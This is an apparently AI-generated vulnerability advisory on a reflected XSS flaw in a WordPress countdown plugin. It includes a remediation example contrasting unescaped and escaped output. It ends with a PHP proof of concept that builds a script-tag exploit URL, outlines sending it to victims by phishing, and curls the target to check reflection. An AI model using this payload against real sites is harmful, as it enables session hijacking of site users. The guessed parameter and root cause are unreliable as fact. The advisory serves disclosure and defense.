Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-27002: CountDown With Image or Video Background <= 1.5 – Reflected Cross-Site Scripting (countdown-with-background)

Severity: Medium (CVSS 6.1)
CWE: 79
Vulnerable Version: 1.5
Patched Version:
Disclosed: January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-27002 (metadata-based):
This vulnerability is a reflected cross-site scripting (XSS) flaw in the CountDown With Image or Video Background WordPress plugin, version 1.5 and earlier. The issue stems from insufficient input sanitization and output escaping in one or more plugin parameters. An unauthenticated attacker can exploit this by tricking a user into clicking a malicious link, leading to arbitrary script execution in the victim’s browser. The CVSS score of 6.1 (Medium severity) reflects the network-based attack vector, low attack complexity, and impacts on confidentiality and integrity within the victim’s browser context.

Atomic Edge research infers the root cause is a failure to properly sanitize user-supplied input before echoing it back in the HTTP response. The CWE-79 classification confirms improper neutralization of input during web page generation. Without a code diff, the exact vulnerable function cannot be confirmed. However, the description indicates the plugin likely accepts user input via a GET or POST parameter and directly outputs it without using WordPress escaping functions like `esc_html()` or `esc_attr()`.

Exploitation requires an attacker to craft a URL containing a malicious script payload in a vulnerable plugin parameter. A victim must be induced to visit this crafted link while authenticated to WordPress. The script then executes in the victim’s session. Based on WordPress plugin patterns, the attack vector is likely a frontend shortcode parameter or an AJAX handler action parameter accessible without authentication. A sample payload could be `?vulnerable_param=alert(document.domain)` appended to a page where the plugin renders its countdown.

Remediation requires implementing proper output escaping or input sanitization. The plugin should use WordPress core functions like `esc_html()`, `esc_attr()`, or `wp_kses()` on any user-controlled data before output. For parameters expected to contain specific data types, validation with `sanitize_text_field()` or type casting is also recommended. A patch would involve adding these escaping functions to the vulnerable echo or print statements.
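The following is an added illustration of the unsafe echo pattern beside the escaped form the remediation describes. It is not the plugin's code and not the Atomic Edge PoC: the advisory does not identify the vulnerable function, so the handler, the `cdwbg_param` and `seconds` parameter names, and the stand-ins for the WordPress core functions are all assumptions made here so the file runs outside WordPress.

```php
<?php
// Added example, not code from countdown-with-background or from Atomic Edge.
// Hypothetical frontend handler reflecting a request parameter the way the
// analysis describes. Stand-ins below only approximate WordPress core so the
// file runs stand-alone; inside WordPress the real core functions are used.
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $t ) { return htmlspecialchars( (string) $t, ENT_QUOTES | ENT_HTML5, 'UTF-8' ); }
    function esc_attr( $t ) { return htmlspecialchars( (string) $t, ENT_QUOTES | ENT_HTML5, 'UTF-8' ); }
    function absint( $n ) { return abs( (int) $n ); }
    function sanitize_text_field( $t ) { return trim( strip_tags( (string) $t ) ); }
}

// Vulnerable pattern (the CWE-79 shape the analysis infers): request data is
// concatenated straight into the HTTP response, in both an attribute and a
// text node, with no escaping at all.
function cdwbg_render_vulnerable( array $request ) {
    $label   = isset( $request['cdwbg_param'] ) ? $request['cdwbg_param'] : '';
    $seconds = isset( $request['seconds'] ) ? $request['seconds'] : 60;
    return '<div class="cdwbg" data-seconds="' . $seconds . '">'
         . '<span class="label">' . $label . '</span></div>';
}

// Hardened pattern: validate/sanitize on the way in (type-cast the integer,
// strip markup from free text) and escape for the output context on the way
// out (esc_attr inside attributes, esc_html inside element content).
function cdwbg_render_fixed( array $request ) {
    $label   = isset( $request['cdwbg_param'] ) ? sanitize_text_field( $request['cdwbg_param'] ) : '';
    $seconds = isset( $request['seconds'] ) ? absint( $request['seconds'] ) : 60;
    return '<div class="cdwbg" data-seconds="' . esc_attr( $seconds ) . '">'
         . '<span class="label">' . esc_html( $label ) . '</span></div>';
}

// Constructed request using the advisory's own sample payload; 'seconds' gets
// a non-numeric value to show that absint() leaves only the integer part.
$request = array(
    'cdwbg_param' => '<script>alert(document.domain)</script>',
    'seconds'     => '15x',
);
$vulnerable = cdwbg_render_vulnerable( $request );
$fixed      = cdwbg_render_fixed( $request );
echo "vulnerable: " . $vulnerable . "\n";
echo "fixed:      " . $fixed . "\n";
// The fixed output carries the text "alert(document.domain)" inertly and
// contains no "<script" token; the vulnerable output contains it verbatim.
echo ( strpos( $fixed, '<script' ) === false ) ? "fixed output is inert\n" : "fixed output still reflects markup\n";
```

A plugin review for this bug class checks every `echo`/`print` that touches `$_GET`, `$_POST`, `$_REQUEST` or a shortcode attribute and confirms an `esc_*()` call matched to the output context sits between the input and the output.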

The impact of successful exploitation is limited to the victim’s browser session but can lead to session hijacking, administrative actions performed on behalf of the user, or defacement of the site frontend. Attackers can steal session cookies, redirect users to malicious sites, or perform actions within the WordPress admin if the victim has elevated privileges. This vulnerability does not directly allow server-side code execution or database access.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-27002 - CountDown With Image or Video Background <= 1.5 - Reflected Cross-Site Scripting
/**
 * Proof of Concept for Reflected XSS in CountDown With Image or Video Background plugin <= 1.5.
 * This script demonstrates exploitation by crafting a malicious link with a JavaScript payload.
 * The exact vulnerable parameter is inferred from the vulnerability description and common plugin patterns.
 * Assumptions:
 * 1. The plugin has a frontend component accessible to unauthenticated users.
 * 2. A GET or POST parameter is reflected without proper escaping.
 * 3. The plugin may use shortcodes or AJAX handlers that accept user input.
 */
$target_url = 'http://vulnerable-wordpress-site.com/';

// Common inferred attack vectors for a countdown plugin:
// 1. A shortcode attribute parameter on a page or post.
// 2. An AJAX action endpoint via admin-ajax.php.
// 3. A direct plugin file parameter.
// This PoC targets a generic GET parameter 'cdwbg_param' as a placeholder.
// In a real attack, the attacker would need to identify the exact parameter name.
$malicious_parameter = 'cdwbg_param';
$payload = '<script>alert(document.domain)</script>';

// Construct the malicious URL.
$exploit_url = $target_url . '?' . $malicious_parameter . '=' . urlencode($payload);

echo "CVE-2025-27002 Reflected XSS PoC\n";
echo "Target: " . $target_url . "\n";
echo "Exploit URL: " . $exploit_url . "\n\n";
echo "Instructions:\n";
echo "1. An attacker would send this URL to a victim (e.g., via phishing).\n";
echo "2. The victim must visit the URL while authenticated to WordPress.\n";
echo "3. The JavaScript payload executes in the victim's browser context.\n";

// Optional: Use cURL to simulate a request and check if the payload is reflected.
// This step may not be reliable if the parameter requires a specific page context.
echo "\n[+] Testing payload reflection...\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 15); // Do not hang on an unreachable target.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$curl_error = curl_error($ch);
curl_close($ch);

if ($response === false) {
    echo "Request failed: " . $curl_error . "\n";
} elseif ($http_code == 200) {
    // A raw (unencoded) copy of the payload in the body means it was echoed without escaping.
    if (strpos($response, $payload) !== false) {
        echo "Payload appears to be reflected in the response (unsanitized).\n";
    } else {
        echo "Payload not found in response. The vulnerable parameter may have a different name or require a specific page.\n";
    }
} else {
    echo "HTTP Status: " . $http_code . "\n";
}
?>
